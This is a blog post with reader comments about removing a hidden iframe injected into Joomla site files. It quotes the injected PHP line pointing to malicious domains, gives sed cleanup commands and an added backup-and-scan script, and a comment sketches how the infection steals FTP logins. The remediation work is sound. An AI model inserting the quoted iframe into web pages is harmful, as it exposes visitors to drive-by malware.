Joomla and WordPress virus

In the last few days my brother's site (which uses the Joomla CMS) was affected by a malicious iframe in all of its HTML and PHP files.
He says that while he was working on his own site, the antivirus started to complain about an HTML/Framer virus every time he loaded his home page. After a quick check I found that his site was the victim of a malicious injection.
Joomla and many other web CMSs can be infected by this kind of attack.
Example malicious sites:

http://internetcountercheck.com

http://thedeadpit.com

Example lines

echo "<iframe src="http://thedeadpit.com/?click=4859468" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

Solution:

find ./ -name index.html -exec sed -i -e 's#<iframe src="http://thedeadpit.com/?click=[0-9]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>##g' {} \;
find ./ -name default.php -exec sed -i -e 's#echo "<iframe src=\"http://thedeadpit.com/?click=[0-9]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";##g' {} \;

find ./ -name default.php -exec sed -i -e 's#echo "<iframe src=\"http://internetcountercheck.com/?click=[0-9]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";##g' {} \;
find ./ -name index.php -exec sed -i -e 's#echo "<iframe src=\"http://internetcountercheck.com/?click=[0-9]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";##g' {} \;
find ./ -name index.html -exec sed -i -e 's#<iframe src="http://internetcountercheck.com/?click=[0-9]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>##g' {} \;
find ./ -name index.htm -exec sed -i -e 's#<iframe src="http://internetcountercheck.com/?click=[0-9]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>##g' {} \;
find ./ -name "*.htm" -exec sed -i -e 's#<iframe src="http://internetcountercheck.com/?click=[0-9]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>##g' {} \;
find ./ -name "*.html" -exec sed -i -e 's#<iframe src="http://internetcountercheck.com/?click=[0-9]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>##g' {} \;
find ./ -name "*.php" -exec sed -i -e 's#echo "<iframe src=\"http://internetcountercheck.com/?click=[0-9]*\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";##g' {} \;
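
A domain-independent version of the check and clean-up above, as an added example that is not part of the original post: it lists the affected files first, archives the tree, then strips the tag whether or not its quotes are backslash-escaped. The function names, the `injected.example` host and the sample files are constructed for illustration; `sed -i -E` assumes GNU sed, as the post's commands do.

```shell
#!/bin/sh
# Added example; function names and sample files are constructed.
# Quotes in the tag may or may not be backslash-escaped (PHP echo vs raw HTML).
IFRAME_RE='<iframe src=\\?"http://[^"\\]*\\?" width=1 height=1 style=\\?"visibility:hidden;position:absolute\\?"></iframe>'

# Read-only: print every .php/.htm/.html file under $1 that contains the tag.
scan_hidden_iframes() {
    find "$1" -type f \( -name '*.php' -o -name '*.htm' -o -name '*.html' \) \
        -exec grep -lE -e "$IFRAME_RE" {} + || true
}

# Archive the tree to $2 (keep it outside the web root), then strip the tag
# from the flagged files only. The echo-wrapped form goes first so that no
# empty echo statement is left behind.
clean_hidden_iframes() {
    tar -cf "$2" -C "$1" . || return 1
    scan_hidden_iframes "$1" | while IFS= read -r f; do
        sed -i -E -e "s#echo \"$IFRAME_RE\";##g" -e "s#$IFRAME_RE##g" "$f"
    done
}

# Constructed sample tree: three injected files and one clean file.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    tag='<iframe src="http://injected.example/?click=123" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>'
    esc=$(printf '%s' "$tag" | sed 's/"/\\"/g')   # backslash-escaped variant
    printf '<html><body>hi%s</body></html>\n' "$tag" > "$d/index.html"
    printf '<?php\necho "%s";\necho "ok";\n' "$tag" > "$d/default.php"
    printf '<?php\necho "%s";\n' "$esc" > "$d/index.php"
    printf '<html><body>clean</body></html>\n' > "$d/about.html"
    echo "$d"
}

tree=$(make_sample_tree)
echo "before: $(scan_hidden_iframes "$tree" | wc -l) infected file(s)"
clean_hidden_iframes "$tree" "$tree.backup.tar"
echo "after:  $(scan_hidden_iframes "$tree" | wc -l) infected file(s)"
rm -rf "$tree" "$tree.backup.tar"
```

Run `scan_hidden_iframes` on its own first and review the list before cleaning; the archive lets the originals be compared or restored afterwards.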


11 Responses to "Joomla and WordPress virus"

Premasis on April 23rd, 2009 11:01 am:

Our website is hacked with the same iframe script. Do not know how to clean it. HELP!!! if you have a solution.


Mohamed Elsayed on June 10th, 2009 3:11 pm:

The solution is to replace all of the Joomla files with a clean and latest version.
Replace all index.html files that are included by default with Joomla with a clean one.

Regards
sava93.com owner


Jonathan Kinney on June 19th, 2009 11:50 am:

This type of infection starts at the end user’s computer, they visit a site with these tags, which leads to a site that infects the end user’s computer via exploits through javascript in a .pdf or .swf (yes, Adobe Reader and shockwave are both exploitable, update them), and then the computer runs malicious code reporting all used and found FTP logins to central server, which then periodically downloads files from all said sites, inserts code, and then uploads the modified files. Javascript in .pdf files was a bad idea in the first place… Make sure you have the latest version as shown on Adobe’s site, the updater sucks, and will often leave you several exploitable versions back. Just a heads up.


Agli on August 6th, 2009 8:15 am:

Please, can anyone help me with how I can execute these scripts on my server?


msamir on August 7th, 2009 3:41 am:

put them in a bash script and run it
or copy and paste them in your shell


Agli on August 12th, 2009 4:11 pm:

Thank you msamir.


CL on October 5th, 2009 10:23 am:

The solution is to replace all of the Joomla files with a clean and latest version.
Replace all index.html files that are included by default with Joomla with a clean one.
Regards
sava93.com owner


mutualfunds on October 6th, 2009 12:20 pm:

Hey, I found your blog while searching on Google your post looks very interesting for me. I will add a backlink and bookmark your site. Keep up the good work!


Harlin on November 3rd, 2009 10:57 pm:

Has anyone replaced all index.html files with clean html files and found solution?


diet on January 17th, 2010 4:29 pm:

Thank you msamir. I'm an expert in viruses, and found your post useful


Mohamed Elsayed on February 4th, 2010 10:02 am:

Hello,

I told you before to replace all of the Joomla files with a clean and latest version.
Replace all index.html files that are included by default with Joomla with a clean one.

Regards
sava93.com owner

